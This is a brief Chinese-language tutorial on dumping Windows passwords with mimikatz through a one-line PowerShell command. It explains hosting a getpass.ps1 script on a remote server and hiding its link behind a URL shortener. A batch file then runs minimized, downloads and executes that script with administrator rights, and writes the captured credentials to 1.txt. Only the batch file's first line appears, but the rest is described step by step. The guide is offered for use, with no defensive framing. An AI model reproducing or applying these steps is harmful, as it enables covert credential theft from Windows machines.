一句话Powershell调用mimikatz抓取Windows密码
mimikatz简要介绍
这篇文章一句powershell调用mimikatz抓密码中提到了这种方法
个人觉得制作成bat脚本使用起来会更加方便,但是唯一的缺点还是必须使用管理员权限启动
实际使用:
- 把ps1(powershell)脚本放在一台可以直接访问的服务器上
如果你下载不了说明你被墙了
复制访问链接如(http://x.x.x.x/getpass.ps1) 然后使用短网址生成器短链接
编写bat脚本,第四行的链接地址应为你自己存放ps1脚本的地址
1 | @echo off |
- @echo off 不回显
- 最小化批处理进程
- 切换到脚本路径
- 使用powershell调用mimikatz抓取用户密码并且将结果保存到脚本所在路径下的1.txt中